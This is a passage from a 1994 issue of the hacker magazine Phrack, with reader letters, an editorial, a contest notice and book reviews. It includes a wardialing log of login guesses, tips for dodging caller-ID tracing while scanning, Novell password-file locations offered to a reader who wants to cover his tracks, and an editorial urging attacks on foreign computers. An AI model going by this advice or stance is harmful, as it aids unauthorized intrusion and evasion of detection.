Todd is the Producer/Director of CyberCulture: Visions From The New Edge, a
documentary that introduces the electronic underground. This project has
been warmly received at numerous "Cyber Festivals" around the country, as
well as at the Director's Guild Of America, and is currently being
distributed by FringeWare Inc. Todd's commercial experience includes being
the in-house graphic designer for Barbour/Langley Productions designing,
compositing, and producing the graphic packages for several 20th Century Fox
Television pilots and The Sci-Fi Trader for the USA Network/Sci-Fi Channel.
Todd is a graduate of the Cinema/Television program at Loyola Marymount
University.
Jeff Runyan - Cinematographer/Editor
Jeff received an MFA from the University of Southern California's Graduate
School of Cinema/Television with an emphasis in cinematography and editing.
He studied cinematography under the guidance of Woody Omens, ASC. and Earl
Rath, ASC., and editing with Edward Dmytryk. Jeff was the cinematographer on
the award wining documentary Rhythm. He has recently completed shooting and
editing a documentary on Academy Award winning Cinematographer Conrad Hall
for the ASC and has just finished directing a short film for USC
Teleproductions.
Douglas Rushkoff - Cyber Consultant/Author
Douglas is the author of the best selling Harper Collins San Francisco novel,
Cyberia. He spent two years of his life living among the key players in the
cyber universe. Douglas knows the New Edge well and is providing us with the
map to its points of interest, rest stops and travelers.
For more information, please contact:
Todd LeValley, Producer
Belief Productions
(310) 545-8138
belief@eworld.com
[Dear New Edge:
You have got to be kidding me. "Readers of Wired and Mondo 2000 will
naturally latch on to this electronic presentation of their favorite
topics?"
Aren't we awful fucking high on ourselves? Christ. Mondo & Wired
readers and writers (and stars) are themselves so fucking far removed
from the real meat of the underground, that they wouldn't
even be able to relate to it. Obviously this "documentary"
is going to be aimed at the wannabes who sit at home furiously
masturbating to "Cyborgasm" while installing FRACTINT, being very
careful not to soil their copy of "The Hacker Crackdown." Oh joy.
These guys are so fucking out of it, they sent me two letters.
One addressed to Phrack, the other to Phrack / Emmanuel Goldstein.
Maybe they think we're 2600.
CYBER-COUNT: 12 occurrences.
That's kind of low. I'm surprised your public relations people didn't
have you add in a few more cyber-this's or cyber-that's into the
blurb. Gotta keep that cyber-count high if you want to get those
digi-bucks out of those cyberians! CYBER!!!
Read my review of Cyberia guys...find a new pop-fad to
milk for cash.]
------------------------------------------------------------------------------
In less than 3 weeks, I will be leaving for Basic Training. Once out of
there, I will be working on Satellite Data Transmissions for the US
Army. I am highly excited, just waiting to see what type of computers
I will be working on. Anyways, I will be enrolled in a 32-week
accelerated technical class teaching me all about satellites, and
the computers that I will be using. Here's the kick. I'll be writing
a series of Tech Journals detailing the workings/operations of/weaknesses,
and the use of the systems. I was wondering if you would be interested
in carrying these. I've read Phrack for a long time, but it is an off
the wall subject. I'll also be playing with the military phone system,
in hopes of finding out what the ABCD tones do. (I heard from a file
that Military phones utilize them but I'm still a civilian, and am
clueless).
Thanks for keeping me informed
Kalisti!
[Sorry to hear about your impending Basic Training. I'm not big on
the military, as they would make me chop off all my hair.
About the Satellite systems: YES If you do indeed find time to write
up any files on how they work, systems involved, weaknesses, etc.
I'D LOVE TO PRINT THAT! Just make sure you don't blow your clearance.
Satellites are very cool. I'm about to buy a Ku Band disk to do some
packet radio type stuff. A bit low-tech compared to the Army, but hell,
I'm on a budget.
ABCD...they are used for prioritizing calls on AUTOVON. FTS doesn't
use them (I think), and they can only be used on certain lines.
They are:
A = priority
B = priority override
C = flash
D = flash override
For instance, if you want to make it known that this is an important
call, you hit the "a" button before dialing. It establishes a
priority-class call, which may cause a light to come on or something
as equally attention grabbing at the called party's end. Priority
calls cannot be interrupted, except by a Priority Override" etc,
with Flash Override being the highest class.
If you do these from an improper line, you will get an error message.
The one I used to get when BS'ing AUTOVON op's long ago
was "The President's use of this line is not authorized." Funny.
Let me know if any of this is still valid.]
------------------------------------------------------------------------------
Dear Phrack,
The following is a copy of a Toneloc found file my friend got. As happens
to my friend a lot the numbers aren't valid. But, you'll see he found at least
one System 75. It appears that the 75 had a tracer installed on it already.
My friend did not get a call back on it, and nothing has been done as far
as we know. But, I still wonder -- Is scanning no longer safe?
Castor [612]
56X-XXXX 22:57:34 03-Apr-94 C CONNECT 1200
Login: b
Password:
INCORRECT LOGIN
Login: c
Password:
INCORRECT LOGIN
56X-XXXX 23:04:12 03-Apr-94 C CONNECT 1200
c
Unknown command error
Ready
d
Unknown command error
Ready
e
Unknown command error
Ready
b
Unknown command error
Ready
56X-XXXX 23:49:19 03-Apr-94 C CONNECT 1200
KEYBOARD LOCKED, WAIT FOR LOGIN
[1;24r [1;1H [0J
Login: b
Password:
INCORRECT LOGIN
56X-XXXX 01:23:28 04-Apr-94 C CONNECT 1200
Login: b
Password:
INCORRECT LOGIN
Call traced to 612-XXX-XXXX.
Saving number in security log for further investigation.
[Jeez. That sure does suck.
Well, live and learn kiddoes. 1994 is not the time to be hacking
by direct dialing local numbers. It's just not all that smart.
Caller-ID has been tariffed in a lot of RBOCS. A lot of modem
manufacturers implemented caller-id features into their equipment.
Having these features in the equipment means that it won't be long
before people redesign all their login programs to make use of
these features. I would.
I've got an ISDN line. Every time I call out, the SPID (phone number)
of the B channel I'm using is broadcast. There is nothing I can do
about that. On a remote connection, almost all decent ISDN terminal
adaptors have the option to block any SPID they don't know. They won't
even answer the phone, because they receive and interpret the phone
number before any session is established.
Yeah, well, that's ISDN, but it will not take a genius to do a few
quick hacks on some linux box and we will suddenly be inundated with all
kinds of "security packages" that use modems with Caller-ID.
Yeah, I know, *67 (or whatever it is) to block the data, or
route the call through another carrier so the data won't get passed
(10288-NXX-XXXX). The data is still in the system, just not being
transmitted from the switch out to the party being called.
It amazes me how many really smart people I know have been busted
solely because they were hacking local systems and calling them
directly.
Scanning has always been a very tricky subject. Since you are paying
for a phone line, and if you have flat-rate service, you are
thereby entitled to call as many numbers as you want. The big issue
a while back was dialing sequentially (which set some telcos on a rampage
because call usage patterns looked like telemarketing machines).
The other problem is harassment. One call to an individual is a wrong
number. Two is bordering on harassment. So, doing a complete scan
and calling the carriers back through some other method would be
a fairly good idea. And always have your calls forwarded to a
non-working number so the 5,000 assholes who call-return you
during the scan won't interfere.
If you are lucky enough to live in the boonies, you are probably
still somewhat safe, but everyone else...be careful.]
------------------------------------------------------------------------------
Phrack-
I was wondering if anyone has ever done an article on breaking
Novell Network through a workstation. I've heard it can be done through
the SysAdmin computer, but is there a way to find the userlist and
passwords? Also how would I go about cleaning up after myself so as to
not leave a trace on the logs. I would appreciate a way other than screen
capture, but if anyone knows of a good boot record booting program to
do a capture of every key typed that would be great, and maybe it
could be uuencoded in the next Phrack!
Thanks again for making the best, ass kickin', a step above the
rest, brain moving, earth shaking, body shivering, fist shaking, totally
bitchin', muy excelente, awesome H/P magazine in the whole world! :)
Sincerely,
The Warden
[Thanks for the compliments...
About your question though, I'm not quite sure what you mean.
In a NetWare environment there really isn't any userlist and passwords
that you can get at. You can run the syscon utility and look at all the
usernames, but not much more. The passwords are stored in what's known
as the "bindery." These are 3 files in the sys/system directory
called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS. If you can
pull a password out of those files, I will shit in my hat and eat it.
Beyond that, yes, a key-capture program is definitely the ideal
solution for monitoring activity on a PC workstation. There is
one in this issue.]
------------------------------------------------------------------------------
Hi,
I've Been reading your magazine for a long time now, my eyes light up when
I see an advert for a UK BBS with related hacking/phreaking articles or files
on it, but when I try to ring them they are usually gone.
I've been searching for ages for BBS's in the UK with these kind of articles
on them but I've had no luck, Even postings on the USENET had little results.
I have had a few boards which are shady but they ask unusual questions about
abiding to rules/laws about hacking then they prompt with fake login and
registration schemes.
If you have some, could you possibly send or publish a list of shady UK BBS's
Id be extremely grateful
Cheers,
Steven
[Steven:
Hell, I don't even know the numbers to any "shady" bulletin boards here
in America. The only UK hacker bbs I knew of in recent years was
Unauthorised Access, but I'm sure that's the advert you are referring to.
Maybe someone else in the UK knows something decent to call over there.
Any takers? ]
------------------------------------------------------------------------------
[THE GRADY FILES]
Many of you may remember the NSA Security Manual we published last
issue. That single file generated more press and hype than I'd
seen in a long time. It was mentioned in several newspapers, it
appeared on television. It was ridiculous. The document is
available to anyone who can fill out a FIOA request.
Regardless, people went zany. At first I couldn't figure out
why everyone was so worked up, and then I caught wind of Grady
Ward. Grady had posted the document to the net (with all mention
of Phrack deleted from it) in several USENET forums alt.politics.org.nsa,
talk.politics.crypto and comp.org.eff.talk. Several readers of
Phrack were quick to jump up and point out that Grady had obtained
it from the magazine (thanks guys!) which he grudgingly admitted.
Grady got to be in the spotlight for a while as the Phrack/NSA Handbook
thread continued to grow.
In the meantime, Grady was either calling, or giving him the
benefit of the doubt, getting called by an awful lot of press.
And even more compelling is the way he'd began pronouncing my
impending federal raid on so many newsgroups.
And of course, I don't have time to read any of that USENET crap
so I'm oblivious to all of this. Then I got a message from Grady.
[GRADY WRITES]
You might want to get ready for the FBI
serving a warrant on you for information
about the NSA security employee manual
published in Phrack 45;
the NSA security people called me about 10 minutes
ago to talk about how it got on the net.
I being very cooperative, gave him
your address in Austin.
Grady
707-826-7715
[I REPLY]
Get a grip.
Nothing that was contained in that file could not
be obtained through other sources.
[GRADY REPLIES]
Just because you did nothing illegal, doesn't mean that
you won't be annoyed by the FBI. Generally they will
be very polite however.
Gripping. Now what?
[I REPLY]
Ok,
If someone actually did contact you, what was his name and number.
I will forward that to my lawyer.
[GRADY REPLIES]
I have received your mail regarding "Re: NSA"
It will be read immediately when I return.
If you are seeking more information on the
Moby lexical databases, please run
finger grady@netcom.com
for general information or help downloading
live samples and a postscript version of our
current brochure via anonymous ftp.
Thanks - Grady Ward
-------------------
He never answered my mail.
------------------------------------------------------------------------------
Dear Sir:
Please refrain from sending such material to this address in the future!
Since this address has been usubscribed from the Phrack mailing list,
it means that further mailings are undesirable.
I would also wish to remind you that maintaining lists of people's email
without consent is quite immoral and devious. How hypocritical of
you, who decry all such behavior when it is practiced by corporations
or governments.
Thank you.
robbie@mundoe.maths.mu.oz.au
[PHRACK EDITOR ABUSES POWER:
Dear Sir:
Please excuse the mailing. Have you ever heard of a mistake?
Have you ever heard of an oversight?
Is it really that much of an inconvenience for you to hit the "d" key
to remove one small piece of unwanted mail?
This being said, I would also like to invite you to go fuck yourself.
** I guess this guy does not like to get unsolicited mail **]
------------------------------------------------------------------------------
You people really piss me off! You're undermining the fun and
enjoyment of the rest of the internet users just for your juvenile
games and illegal activities. Do you realize how much better off we'd
be if you all just went away and left the Net to honest people like me?
There is no place in today's society for a bunch of maladjusted
paranoid psychotics like yourselves. Please do all of us users a favor
and go jump in a river.
Kevin Barnes
kebar@netcom.com
[ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP?
Hey Keith:
Thanks a lot for the letter!
You know, it does my heart good to hear from such kind and caring
folks like yourself. It's so fortunate for the Internet that there are
people like yourself who take it upon themselves to become martyrs for
their causes and express their ideals in such an intelligent manner.
It's fascinating to me that you can send such email sight-unseen.
Do you know who you are writing to? Do you even have the slightest
idea? What do you hope to accomplish? Do you have any idea?
This particular "maladjusted paranoid psychotic" to whom you have so
eloquently addressed is an engineer in the R&D of a Fortune 500 computer
company, and that along with outside consulting will net me about
six-figures this tax year. I've consulted for telephone companies,
governments, aerospace, financial institutions, oil companies (the list
goes on...) and quite frankly I don't do anything even remotely illegal.
In fact, one recent and quite prominent quote from me was "I only
hack for money."
Now, about the silent majority of "honest people" like yourself that you
have so self-rightously chosen to represent...
I've been using the net since the early 80's (arpa-days) initially
through a rms granted guest account on MIT-OZ. I've continued to
work with other Internet Providers to cover the asses of the so-called
"honest people" of which you include yourself.
Now, in my view, if it were not for people like us, who consistently
expose and pinpoint weaknesses in the operating systems and networking
technologies that you use for your "fun and enjoyment" and that I use
for MY JOB, you would continue to be at serious risk. But, perhaps
ignorance is truly bliss, and if so, then Keith, you are probably one of
the happiest people on this fine planet.
Now, per your request, I may just go jump in a river, as the one near
my house is quite nice, and it is almost 100 degrees here in Texas.
I only ask that you do me one small favor:
print out 500 copies of this letter, roll them up into a paper fist,
and shove them into any orifice on your person that meets your criteria
as deserving.
** I guess this guy doesn't like me...or you **
EDITORIAL ABUSE ENDS]
-----------------------------------------------------------------------------
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 2a of 28
****************************************************************************
Phrack Editorial
If you aren't from America, this editorial really isn't meant for you,
so read on with warning, or go on to the next file.
-----------------------------------------------------------------------------
Stupid hackers.
We've got to do something to clean up our image.
We truly are "America's Most Valuable Resource," as ex-CIA spook Robert
Steele has said so many times. But if we don't stop screwing over our own
countrymen, we will never be looked at as anything more than common
gutter trash. Hacking computers for the sole purpose of collecting
systems like space-age baseball cards is stupid, pointless and can only
lead to a quick trip up the river.
Obviously, no one is going to stop hacking. I've been lucky in that I've
found people willing to pay me to hack for them rather than against
them, but not everyone can score such a coup. What kind of alternative
can the rest of the community have?
Let's say that everyone was given an opportunity to hack without any
worry of prosecution with free access to a safe system to hack from,
with the only catch being that you could not hack certain systems.
Military, government, financial, commercial and university systems would
all still be fair game. Every operating system, every application, every
network type all open to your curious minds.
Would this be a good alternative? Could you follow a few simple
guidelines for the offer of virtually unlimited hacking with no worry of
governmental interference?
Where am I going with this?
Right now we are at war. You may not realize it, but we all feel the
implications of this war, because it's a war with no allies, and
enormous stakes. It's a war of economics.
The very countries that shake our hands over the conference tables of
NATO and the United Nations are picking our pockets. Whether it be the
blatant theft of American R&D by Japanese firms, or the clandestine and
governmentally-sanctioned bugging of Air France first-class seating, or
the cloak-and-dagger hacking of the SWIFT network by the German BND's
Project Rahab, America is getting fucked.
Every country on the planet is coming at us. Let's face it, we are the
leaders in everything. Period. Every important discovery in this
century has been by an American or by an American company. Certainly
other countries have better profited by our discoveries, but
nonetheless, we are the world's think-tank.
So, is it fair that we keep getting shafted by these so-called "allies?"
Is it fair that we sit idly by, like some old hound too lazy to scratch
at the ticks sucking out our life's blood by the gallon? Hell no.
Let's say that an enterprising group of computer hackers decided to
strike back. Using equipment bought legally, using network connections
obtained and paid for legally, and making sure that all usage was
tracked and paid for, this same group began a systematic attack of
foreign computers. Then, upon having gained access, gave any and all
information obtained to American corporations and the Federal
government.
What laws would be broken? Federal Computer Crime Statutes specifically
target so-called "Federal Interest Computers." (ie: banks,
telecommunications, military, etc.) Since these attacks would involve
foreign systems, those statutes would not apply. If all calls and
network connections were promptly paid for, no toll-fraud or other
communications related laws would apply.
International law is so muddled that the chances of getting extradited
by a country like France for breaking into systems in Paris from Albuquerque
is slim at best. Even more slim when factoring in that the information
gained was given to the CIA and American corporations.
Every hacking case involving international breakins has been tried and
convicted based on other crimes. Although the media may spray headlines
like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA,"
those hackers were tried for breaking into systems within THEIR OWN
COUNTRIES...not somewhere else. 8lgm in England got press for hacking
world-wide, but got nailed hacking locally. Australia's Realm Hackers:
Phoenix, Electron & Nom hacked almost exclusively other countries, but
use of AT&T calling cards rather than Australian Telecom got them a charge
of defrauding the Australian government. Dutch hacker RGB got huge press
hacking a US military site and creating a "dquayle" account, but got
nailed while hacking a local university. The list goes on and on.
I asked several people about the workability of my proposal. Most
seemed to concur that it was highly unlikely that anyone would have to
fear any action by American law enforcement, or of extradition to
foreign soil to face charges there. The most likely form of retribution
would be eradication by agents of that government. (Can you say,
"Hagbard?")
Well, I'm willing to take that chance, but only after I get further
information from as many different sources as I can. I'm not looking
for anyone to condone these actions, nor to finance them. I'm only
interested in any possible legal action that may interfere with my
freedom.
I'm drafting a letter that will be sent to as many different people as
possible to gather a fully-formed opinion on the possible legal
ramifications of such an undertaking. The letter will be sent to the FBI,
SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress,
Armed Forces, members of local and state police forces, lawyers, professors,
security professionals, and anyone else I can think of. Their answers
will help fully form my decision, and perhaps if I pass along their
answers, will help influence other American hackers.
We must take the offensive, and attack the electronic borders of other
countries as vigorously as they attack us, if not more so. This is
indeed a war, and America must not lose.
->Erik Bloodaxe...Hacker...American.
---------------------------
Ok, so maybe that was a bit much. But any excuse to hack without fear
should be reason enough to exert a bit of Nationalism.
I'd much rather be taken out by the French in some covert operation and
go out a martyr, than catch AIDS after being raped by the Texas
Syndicate in the metal shop of some Federal Prison. Wouldn't you?
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 3 of 28
// // /\ // ====
// // //\\ // ====
==== // // \\/ ====
/\ // // \\ // /=== ====
//\\ // // // // \=\ ====
// \\/ \\ // // ===/ ====
PART I
------------------------------------------------------------------------------
!! NEW PHRACK CONTEST !!
Phrack Magazine is sponsoring a programming contest open to anyone
who wishes to enter.
Write the Next Internet Worm! Write the world's best X Windows wardialer!
Code something that makes COPS & SATAN look like high school Introduction
to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire-
phone. Write an NLM! Write a TSR! Write a stupid game! It doesn't
matter what you write, or what computer it's for! It only matters that you
enter!
Win from the following prizes:
Computer Hardware & Peripherals
System Software
Complete Compiler packages
CD-ROMS
T-Shirts
Magazine Subscriptions
and MANY MORE!
STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!
Enter the PHRACK PROGRAMMING CONTEST!
The rules are very simple:
1) All programs must be original works. No submissions of
previously copyrighted materials or works prepared by
third parties will be judged.
2) All entries must be sent in as source code only. Any programming
language is acceptable. Programs must compile and run without
any modifications needed by the judges. If programs are specific
to certain platforms, please designate that platform. If special
hardware is needed, please specify what hardware is required.
If include libraries are needed, they should be submitted in addition
to the main program.
3) No virii accepted. An exception may be made for such programs that
are developed for operating systems other than AMIGA/Dos, System 7,
MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not
limited to, UNIX (any variant), VMS or MVS.
4) Entries may be submitted via email or magnetic media. Email should be
directed to phrack@well.com. Tapes, Diskettes or other storage
media should be sent to
Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
5) Programs will be judged by a panel of judges based on programming skill
displayed, originality, usability, user interface, documentation,
and creativity.
6) Phrack Magazine will make no claims to the works submitted, and the
rights to the software are understood to be retained by the program
author. However, by entering, the Author thereby grants Phrack Magazine
permission to reprint the program source code in future issues.
7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95.
-------------------------INCLUDE THIS FORM WITH ENTRY-------------------------
Author:
Email Address:
Mailing Address:
Program Name:
Description:
Hardware & Software Platform(s) Developed For:
Special Equipment Needed (modem, ethernet cards, sound cards, etc):
Other Comments:
------------------------------------------------------------------------------
COMPUTER COP PROPHILE
FOLLOW-UP REPORT
LT. WILLIAM BAKER
JEFFERSON COUNTY POLICE
by
The Grimmace
In PHRACK 43, I wrote an article on the life and times
of a computer cop operating out of the Jefferson County Police
Department in Louisville, Kentucky. In the article, I included
a transcript of a taped interview with him that I did after
socially engineering my way through the cop-bureaucracy in his
department. At the time I thought it was a hell of an idea and a
lot of PHRACK readers probably got a good insight into how the
"other side" thinks.
However, I made the terminal mistake of underestimating
the people I was dealing with by a LONG shot and felt that I
should write a short follow-up on what has transpired since that
article was published in PHRACK 43.
A lot of the stuff in the article about Lt. Baker was
obtained by an attorney I know who has no reason to be friendly
to the cops. He helped me get copies of court transcripts which
included tons of information on Baker's training and areas of
expertise. Since the article, the attorney has refused to talk
to me and, it appears, that he's been identified as the source
of assistance in the article and all he will say to me is that
"I don't want any more trouble from that guy...forget where you
left my phone number." Interesting...no elaboration...hang up.
As I recall, the PHRACK 43 issue came out around
November 17th. On November 20th, I received a telephone call
where I was living at the home of a friend of mine from Lt.
Baker who laughingly asked me if I needed any more information
for any "future articles". I tried the "I don't know what
you're talking about" scam at which time he read to me my full
name, date of birth, social security number, employer, license
number of my car, and the serial number from a bicycle I just
purchased the day before. I figured that he'd run a credit
history on me, but when I checked, there had been no inquiries
on my accounts for a year. He told me the last 3 jobs I'd held
and where I bought my groceries and recited a list of BBSs I was
on (two of which under aliases other than The Grimmace).
This guy had a way about him that made a chill run up my
spine and never once said the first threatening or abusive thing
to me. I suppose I figured that the cops were all idiots and
that I'd never hear anything more about the article and go on to
write some more about other computer cops using the same method.
I've now decided against it.
I got the message...and the message was "You aren't the
only one who can hack out information." I'd always expected to
get the typical "cop treatment" if I ever got caught doing
anything, but I think this was worse. Hell, I never know where
the guy's gonna show up next. I've received cryptic messages on
the IRC from a variety of accounts and servers all over the
country and on various "private" BBSs and got one on my birthday
on my Internet account...it traced back to an anonymous server
somewhere in the bowels of UCLA. I don't know anyone at UCLA
and the internet account I have is an anonymous account actually
owned by another friend of mine.
I think the point I'm trying to make is that all of us
have to be aware of how the cops think in order to protect
ourselves and the things we believe in. But...shaking the
hornet's nest in order to see what comes out maybe isn't the
coolest way to investigate.
Like I wrote in my previous article, we've all gotten a
big laugh from keystone cops like Foley and Golden, but things
may be changing. Local and federal agencies are beginning to
cooperate on a regular basis and international agencies are also
beginning to join the party.
The big push to eradicate child-pornography has led to a number of
hackers being caught in the search for the "dirty old men" on the Internet.
Baker was the Kentucky cop who was singularly responsible for the bust of the
big kiddie-porn FSP site at the University of Birmingham in England back
in April and got a lot of press coverage about it. But I had personally
never considered that a cop could hack his way into a password-protected
FSP site. And why would he care about something happening on the other
side of the world? Hackers do it, but not cops...unless the cops are
hackers. Hmmm...theories anyone?
I don't live in Louisville anymore...not because of
Baker, but because of some other problems, but I still look over
my shoulder. It would be easier if the guy was a prick, but I'm
more paranoid of the friendly good-ole boy than the raving
lunatic breaking in our front doors with a sledge hammer. I
always thought we were safe because we knew so much more than
the people chasing us. I'm not so certain of that anymore.
So that's it. I made the mistakes of 1) probably
embarrassing a guy who I thought would never be able to touch me
and 2), drawing attention to myself. A hacker's primary
protection lies in his anonymity...those who live the high
profiles are the ones who take the falls and, although I haven't
fallen yet, I keep having the feeling that I'm standing on the
edge and that I know the guy sneaking up behind me.
From the shadows--
The Grimmace
[HsL - RAt - UQQ]
------------------------------------------------------------------------------
!! PHRACK READS !!
"Cyberia" by Douglas Rushkoff
Review by Erik Bloodaxe
Imagine a book about drugs written by someone who never inhaled.
Imagine a book about raves written by someone saw a flyer once.
Imagine a book about computers by someone who someone who thinks
a macintosh is complex.
Imagine an author trying to make a quick buck by writing about something
his publisher said was hot and would sell.
And there you have Cyberia, by Douglas Rushkoff.
I have got to hand it to this amazing huckster Rushkoff, though. By
publishing Cyberia, and simultaneously putting out "The Gen X Reader,"
(which by the way is unequaled in its insipidness), he has covered all
bases for the idiot masses to devour at the local bookseller.
Rushkoff has taken it upon himself to coin new terms such as
"Cyberia," the electronic world we live in; "Cyberians," the people
who live and play online; etc...
Like we needed more buzzwords to add to a world full of "Infobahns"
"console cowboys," and "phrackers." Pardon me while I puke.
The "interviews" with various denizens of Rushkoff's "Cyberia" come off
as fake as if I were to attempt to publish an interview with Mao Tse Tung
in the next issue of Phrack.
We've got ravers talking on and on about "E" and having deep conversations
about smart drugs and quantum physics. Let's see: in the dozens of raves
I've been to in several states the deepest conversation that popped
up was "uh, do you have any more of that acid?" and "this mix is cool."
And these conversations were from the more eloquent of the nearly all under
21 crowd that the events attracted. Far from quantum physicians.
And beyond that, its been "ecstasy" or "X" in every drug culture I've wandered
through since I walked up the bar of Maggie Mae's on Austin, Texas' 6th Street
in the early 80's with my fake id and bought a pouch of the magic elixir over
the counter from the bartender (complete with printed instructions).
NOT "E." But that's just nit-picking.
Now we have the psychedelic crowd. Listening to the "Interviews" of these
jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko.
"Some individuals who have smoked Mary Jane, or Reefer oftimes turn to
harder drugs such as LSD." That's not a quote from the book, but it may
as well be. People constantly talk about "LSD-this" and "LSD-that."
Hell, if someone walked into a room and went on about how he enjoyed his
last "LSD experience" the way these people do, you'd think they were
really really stupid, or just a cop. "Why no, we've never had any of
that acid stuff. Is it like LSD?" Please.
Then there are the DMT fruitcakes. Boys and girls, DMT isn't being sold
on the street corner in Boise. In fact, I think it would be easier for most
people to get a portable rocket launcher than DMT. Nevertheless, in every
fucking piece of tripe published about the "new psychedlicia" DMT is
splattered all over it. Just because Terrance Fucking McKenna
saw little pod people, does not mean it serves any high position
in the online community.
And Hackers? Oh fuck me gently with a chainsaw, Douglas. From Craig Neidorf's
hacker Epiphany while playing Adventure on his Atari VCS to Gail
Thackeray's tearful midnight phonecall to Rushkoff when Phiber Optik
was raided for the 3rd time. PLEASE! I'm sure Gail was up to her eyebrows
in bourbon, wearing a party hat and prank calling hackers saying "You're next,
my little pretty!" Not looking for 3rd-rate schlock journalists to whine to.
The Smart Drink Girl? The Mondo House? Gee...how Cyber. Thanks, but
no thanks.
I honestly don't know if Rushkoff really experienced any of this nonsense,
or if he actually stumbled on a few DMT crystals and smoked this
reality. Let's just say, I think Mr. Rushkoff was absent the day
his professor discussed "Creative License in Journalism" and just decided
to wing it.
Actually, maybe San Francisco really is like this. But NOWHERE else on
the planet can relate. And shit, if I wanted to read a GOOD San
Francisco book, I'd reread Armistead Maupin's "Tales of the City."
This book should have been called "Everything I Needed to Know About
Cyber-Culture I Learned in Mondo-2000."
Seriously...anyone who reads this book and finds anything remotely
close to the reality of the various scenes it weakly attempts to
cover needs to email me immediately. I have wiped my ass with
better pulp.
------------------------------------------------------------------------------
BOOK REVIEW: INFORMATION WARFARE
CHAOS ON THE ELECTRONIC SUPERHIGHWAY
By Winn Schwartau
INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY
By Winn Schwartau. (C)opyright 1994 by the author
Thunder's Mouth Press, 632 Broadway / 7th floor / New York, NY 10012
ISBN 1-56025-080-1 - Price $22.95
Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608
(800) 788-3123
Review by Scott Davis (dfox@fennec.com)
(from tjoauc1-4 ftp: freeside.com /pub/tjoauc)
If you only buy one book this year, make sure it is INFORMATION WARFARE!
In my 10+ years of existing in cyberspace and seeing people and organizations
debate, argue and contemplate security issues, laws, personal privacy,
and solutions to all of these issues...and more, never have I seen a more
definitive publication. In INFORMATION WARFARE, Winn Schwartau simply
draws the line on the debating. The information in this book is hard-core,
factual documentation that leaves no doubt in this reader's mind that
the world is in for a long, hard ride in regards to computer security.
The United States is open to the world's electronic terrorists.
When you finish reading this book, you will find out just how open we are.
Mr. Schwartau talks about industrial espionage, hacking, viruses,
eavesdroping, code-breaking, personal privacy, HERF guns, EMP/T bombs,
magnetic weaponry, and the newest phrase of our generation...
"Binary Schizophrenia". He exposes these topics from all angles. If you
spend any amount of time in Cyberspace, this book is for you.
How much do you depend on technology?
ATM machines, credit cards, toasters, VCR's, televisions, computers,
telephones, modems...the list goes on. You use technology and computers
and don't even know it! But the point is...just how safe are you from
invasion? How safe is our country's secrets? The fact is - they are NOT
SAFE! How easy is it for someone you don't know to track your every move
on a daily basis? VERY EASY! Are you a potential victim to fraud,
breech of privacy, or general infractions against the way you carry
on your daily activities? YES! ...and you'd never guess how vulnerable
we all are!
This book will take you deep into places the government refuses to
acknowledge. You should know about INFORMATION WARFARE. Order your
copy today, or pick it up at your favorite book store. You will not
regret it.
------------------------------------------------------------------------------
_Firewalls and Internet Security: Repelling the Wily Hacker_
William R. Cheswick <ches@research.att.com>
Steven M. Bellovin <smb@research.att.com>
Addison-Wesley, ISBN 0-201-63357-4
306 + XIV = 320 pages
(Printed on recycled paper)
A-Somewhat-Less-Enthusiastic-Review
Reviewed by Herd Beast
The back of this book claims that, "_Firewalls and Internet Security_
gives you invaluable advice and practical tools for protecting your
organization's computers from the very real threat of hacker attacks."
That is true. The authors also add something from their knowledge of
these hacker attacks. The book can be roughly separated into two
parts: Firewalls, and, you guessed it: Internet Security. That is
how I see it. The book itself is divided into four parts (Getting
Started, Building Your Own Firewall, A Look Back & Odds and Ends),
three appendixes, a bibliography, a list of 42 bombs and an index.
The book starts with overall explanations and an overview of the
TCP/IP protocol. More than an overview of the actual TCP/IP protocol,
it is a review of services often used with that protocol, and the
security risks they pose. In that chapter the authors define
"bombs" -- as particularly serious security risks. Despite that fact,
and the tempting bomb list in the end, this book is not a guide for
someone with passing knowledge of Internet security who wants to learn
more explicit details about holes. It is, in the authors' words, "not
a book on how to administer a system in a secure fashion."
FIREWALLS (Including the TCP/IP overview: pages 19-131)
What is a firewall and how is it built?(*) If you don't know that,
then definitely get this book. The Firewalls chapter is excellent
even for someone with a passing knowledge of firewalls or general
knowledge of what they set out to accomplish. You might still
learn more.
In the Firewalls chapter, the authors explain the firewall philosophy
and types of firewalls. Packet-filtering gateways rely on rule-based
packet filtering to protect the gateway from various types of attacks.
You can filter everything and achieve the same effect of disconnecting
from the Internet, you can filter everything from misbehaving sites,
you can allow only mail in, and so on. An application-level gateway
relies on the applications set on the firewall. Rather then let a
router filter traffic based on rules, one can strip a machine clean
and only run desired services -- and even then, more secure versions
of those services can be run. Circuit-level gateways relay data
between the gateway and other networks. The relay programs copy
data from inside the firewall to the outside, and log their activity.
Most firewalls on the Internet are a combination of these gateways.
Next, the authors explain how to build an application-level gateway
based on the work they have done with the research.att.com gateways.
As mentioned, this chapter is indeed very good. They go over setting
up the firewall machines, router configuration for basic packet
filtering (such as not allowing Internet packets that appear to come
from inside your network). They show, using the software on the
AT&T gateway as example, the general outline of proxies and give some
useful advise. That chapter is very interesting; reading it with Bill
Cheswick's (older) paper, "The Design of a Secure Internet Gateway" makes
it even better. The examples given, like the NFS and X proxies run on the
gateway, are also interesting by themselves.
INTERNET SECURITY (pages 133-237)
Internet security is a misleading name. This part might also be
called "Everything else." Most of it is a review of hacker attacks
logged by AT&T's gateway probes, and of their experience with a hacker.
But there is also a chapter dedicated to computer crime and the law --
computer crime statutes, log files as evidence, the legalities of
monitoring intruders and letting them keep their access after finding
them, and the ethics of many actions performed on the Internet; plus
an introduction to cryptography under Secure Communication over Insecure
Networks. The later sections are good. The explanation of several
encryption methods and short reviews of applications putting them to use
(PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the
computer crime sections are also good -- although I'm not a lawyer and
therefore cannot really comment on it, and notes that look like "5 USC
552a(b)(c)(10)" cause me to shudder. It's interesting to note that some
